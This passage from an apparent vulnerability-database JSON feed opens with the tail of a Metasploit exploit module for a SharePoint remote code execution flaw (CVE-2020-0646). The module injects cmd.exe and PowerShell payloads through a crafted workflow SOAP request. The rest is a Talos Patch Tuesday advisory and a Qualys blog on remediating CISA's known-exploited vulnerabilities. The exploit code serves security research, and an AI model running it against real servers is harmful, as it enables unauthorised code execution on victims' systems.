Dalili'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0646'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' => [\r\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\r\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\r\n [ 'Windows 
Powershell',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :windows_powershell\r\n ]\r\n ],\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-03-02',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE,],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n },\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\r\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n end\r\n\r\n def check\r\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\r\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\r\n\r\n compiler_errors = extract_compiler_errors(res)\r\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\r\n\r\n # once patched you get a specific compiler error message about the type name\r\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def extract_compiler_errors(res)\r\n return nil unless res&.code == 200\r\n\r\n xml_doc = res.get_xml_document\r\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\r\n return nil if result.length == 0\r\n\r\n xml_result = Nokogiri::XML(result)\r\n xml_result.xpath('//CompilerError/@Text')\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n case target['Type']\r\n when :windows_command\r\n execute_command(payload.encoded)\r\n when :windows_dropper\r\n cmd_target = 
targets.select {|target| target['Type'] == :windows_command}.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space']})\r\n when :windows_powershell\r\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\r\n end\r\n end\r\n\r\n def escape_command(cmd)\r\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\r\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n xoml_data = <<-EOS\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\r\n <workflowMarkupText>\r\n <![CDATA[\r\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\r\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\r\n </SequentialWorkflowActivity>\r\n ]]>\r\n </workflowMarkupText>\r\n <rulesText></rulesText>\r\n <configBlob></configBlob>\r\n <flag>2</flag>\r\n </ValidateWorkflowMarkupAndCreateSupportObjects>\r\n </soap:Body>\r\n</soap:Envelope>\r\n EOS\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => xoml_data,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n unless res&.code == 200\r\n print_error('Non-200 
HTTP response received while trying to execute the command')\r\n end\r\n\r\n res\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/48275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-01-17T23:27:08", "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n_ \n_**Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by **_**spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority.**_ \n \nMicrosoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's [Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan>) covers 49 vulnerabilities, eight of which are considered critical. \n \nThis month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs [says the vulnerability is so serious](<https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/>), Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n \nJanuary's update is also the last that will provide free updates to Windows 7 and Windows Server 2008/2008 R2. 
\n \nTalos also released a new set of [SNORT\u24c7 rules](<https://snort.org/advisories/talos-rules-2020-01-14>) that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed eight critical vulnerabilities this month, all of which we will highlight below. \n \n[CVE-2020-0603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603>), [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605>), [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606>) and [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646>) are all remote code execution vulnerabilities in the .NET and ASP.NET core software. All four of these vulnerabilities can be triggered if a user opens a malicious, specially crafted file while using an affected version of .NET or ASP.NET Core. If successful, an attacker could then execute arbitrary code in the context of the current user. These bugs exist in how the software handles objects in memory. \n \n[CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>) are remote code execution vulnerabilities in the Windows Remote Desktop Protocol Gateway Server. An attacker could exploit these bugs by sending a specially crafted request to the victim's system RDP Gateway via RDP. This vulnerability is pre-authentication and does not require any user interaction. \n \n[CVE-2020-0611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611>) is a remote code execution vulnerability in the Windows Remote Desktop Protocol client. 
This vulnerability can be triggered if a user visits a malicious, specially crafted server. An attacker would need to trick the user into connecting to this server, either via a malicious file or a man-in-the-middle technique. The attacker could then execute arbitrary code on the victim's machine. \n \n[CVE-2020-0640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0640>) is a memory corruption vulnerability that exists in the way the Internet Explorer web browser handles objects in memory. An attacker could use this bug to corrupt the victim machine, and then gain the ability to execute arbitrary code. A user can trigger this vulnerability by visiting a malicious, attacker-controlled web page in Internet Explorer. \n \n\n\n### Important vulnerabilities\n\nThis release also contains 41 important vulnerabilities, three of which we will highlight below. \n \n[CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a spoofing vulnerability in Windows CryptoAPI. The specific component, crypt32.dll, improperly validates Elliptic Curve Cryptography certificates. An attacker could exploit this bug to spoof a code-signing certificate and secretly sign a file, making that file appear as if it is from a trusted source. A malicious actor could also use this vulnerability to conduct man-in-the-middle attacks and decrypt confidential information. \n \n[CVE-2020-0616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0616>) is a denial-of-service vulnerability in Windows due to the way the operating system handles hard links. An attacker needs to log onto the victim machine to exploit this bug, and then run a specially crafted application that would allow them to overwrite system files. 
\n \n[CVE-2020-0654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0654>) is a vulnerability in the OneDrive app for Android devices that could allow an attacker to bypass certain security features. If the user accesses a link to a file in a OneDrive folder in a certain way, they could bypass the passcode or fingerprint requirements for the app. \n \nThe other important vulnerabilities are: \n\n\n * [CVE-2020-0602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602>)\n * [CVE-2020-0607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0607>)\n * [CVE-2020-0608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0608>)\n * [CVE-2020-0612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0612>)\n * [CVE-2020-0613](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0613>)\n * [CVE-2020-0614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0614>)\n * [CVE-2020-0615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0615>)\n * [CVE-2020-0617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0617>)\n * [CVE-2020-0620](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0620>)\n * [CVE-2020-0621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0621>)\n * [CVE-2020-0622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0622>)\n * [CVE-2020-0623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0623>)\n * [CVE-2020-0624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0624>)\n * [CVE-2020-0625](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0625>)\n * [CVE-2020-0626](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0626>)\n * 
[CVE-2020-0627](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0627>)\n * [CVE-2020-0628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0628>)\n * [CVE-2020-0629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0629>)\n * [CVE-2020-0630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0630>)\n * [CVE-2020-0631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0631>)\n * [CVE-2020-0632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0632>)\n * [CVE-2020-0633](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0633>)\n * [CVE-2020-0634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0634>)\n * [CVE-2020-0635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0635>)\n * [CVE-2020-0636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0636>)\n * [CVE-2020-0637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0637>)\n * [CVE-2020-0638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0638>)\n * [CVE-2020-0639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0639>)\n * [CVE-2020-0641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0641>)\n * [CVE-2020-0642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642>)\n * [CVE-2020-0643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0643>)\n * [CVE-2020-0644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0644>)\n * [CVE-2020-0647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0647>)\n * [CVE-2020-0650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0650>)\n * 
[CVE-2020-0651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0651>)\n * [CVE-2020-0652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0652>)\n * [CVE-2020-0653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0653>)\n * [CVE-2020-0656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0656>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 52593 - 52596, 52604, 52605 \n \n\n\n#### AMP Advanced Custom Detection (ACD) signature\n\n \nWhile there can be multiple ways that an attacker can exploit CVE-2020-0601, AMP can be used to detect spoofed certificates that are masquerading as a Microsoft ECC Certificate Authority by adding an advanced custom detection signature. The process to add this signature can be found in the [AMP documentation](<https://docs.amp.cisco.com/AMP%20for%20Endpoints%20User%20Guide.pdf>) on page 33 in the Outbreak Control section under custom detections. The actual custom signature that needs to be added can be downloaded [here](<https://blogs.cisco.com/cve-2020-0601-2>). \n\n", "cvss3": {}, "published": "2020-01-17T10:14:27", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Jan. 
2020: Vulnerability disclosures and Snort coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0624", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0636", "CVE-2020-0637", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646", "CVE-2020-0647", "CVE-2020-0650", "CVE-2020-0651", "CVE-2020-0652", "CVE-2020-0653", "CVE-2020-0654", "CVE-2020-0656"], "modified": "2020-01-17T10:14:27", "id": "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6XqA-qeq9Xs/microsoft-patch-tuesday-jan-2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. 
CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps CVEs from the catalog to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and marks them with the RTI field \u201cCISA Exploited\u201d. This is an ongoing effort, because CISA frequently amends the catalog with the latest CVEs as part of its regular feeds.\n\nDirective 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of these identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend executing your search based on QQL (Qualys Query Language), as shown here for the QIDs released by Qualys: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:\"true\"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. 
Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities listed by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help them comply with the aggressive remediation timelines that CISA set in the directive. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
